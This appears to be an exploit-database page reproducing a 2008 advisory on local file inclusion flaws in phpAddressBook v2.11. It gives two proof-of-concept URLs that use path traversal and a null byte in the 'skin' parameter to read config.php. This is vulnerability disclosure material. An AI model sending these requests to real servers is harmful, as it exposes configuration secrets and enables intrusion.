header-logo
Suggest Exploit
vendor:
phpAddressBook
by:
0x90
9.3
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: phpAddressBook
Affected Version From: 2.11
Affected Version To: 2.11
Patch Exists: YES
Related CWE: N/A
CPE: a:phpaddressbook:phpaddressbook:2.11
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

phpAddressBook v2.11 Multiple Local File Inclusion Vulnerabilities

phpAddressBook v2.11 is prone to multiple local file inclusion vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to include arbitrary local files and execute arbitrary code in the context of the webserver process. This may facilitate unauthorized access or privilege escalation.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability.
Source

Exploit-DB raw data:

      /  _  \ /\  /\ / _  \ /  _  \
      | | | | \ \/ / ||_| | | | | |
      | | | |  \  /  \_   | | | | |
      | |_| |  /  \   __\ | | |_| |
      \_____/ / /\ \ |____/ \_____/
              \/  \/


[~] phpAddressBook v2.11 Multiple Local File Inclusion Vulnerabilities

[~] Download: http://downloads.coronamatrix.org/phpAddressBookv2.11.zip

[~] Founder: 0x90

[~] HomePage: www.0x90.com.ar

[~] Public: http://0x90.com.ar/Advisory/20080321.txt

[~] Contact: Guns[at]0x90[dot]com[dot]ar

[~] PoC:

   http://[host]/[path]/index.php?skin=/../config.php %00
   http://[host]/[path]/install.php?skin=/../config.php %00


Greetz: ...

# milw0rm.com [2008-03-21]

Navigation

Suggest Exploit

Services By CQR